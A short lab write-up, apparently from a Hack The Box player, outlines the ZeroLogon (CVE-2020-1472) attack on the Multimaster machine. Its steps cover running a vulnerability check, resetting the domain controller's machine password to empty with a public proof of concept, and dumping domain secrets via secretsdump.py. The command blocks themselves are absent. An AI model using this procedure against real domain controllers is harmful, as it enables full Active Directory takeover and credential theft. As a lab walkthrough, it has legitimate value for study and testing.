CVE-2020-1472 - ZeroLogon

Overview

The attack described here takes advantage of flaws in a cryptographic authentication protocol that proves the authenticity and identity of a domain-joined computer to the DC. Due to incorrect use of an AES mode of operation it is possible to spoof the identity of any computer account (including that of the DC itself) and set an empty password for that account in the domain. (Secura)

Found Here

Installation

Then cd into the folder and execute

Testing if a DC is vulnerable

Spoiler, they probably are.

First, clone the following repo and install the requirements

Running the Check Script

Now that we have the testing script installed, we can check a host to see if they are vulnerable, I will be running this against the Multimaster machine from Hack The Box.

The command is as follows:

Bingo! We can see that the host is vulnerable!

Exploiting a Domain Controller

Risks

If you are doing this in a working production environment then you need to make sure you have the hash of the Domain Controller Machine Account as this wil be needed to reset the host after you have exploited it, otherwise it will no longer be able to communicate with other DC’s.

Getting the POC

To get the exploit, clone this git repo and make sure you have impacket installed

Now we can run the exploit against our vulnerable target machine

If all was sucessfull you will get a Result: 0

Dumping Domain Secrets with secretsdump.py

Now we have set the machine password to an empty string, “”, we can now DCSync with secretsdump.py to get all the domain secrets.

And just like that I’ve owned your whole AD Environment, in less that two minutes.

Respect

If you enjoyed the write up or found it useful consider + repping my htb profile linked below:

Categories:

Updated: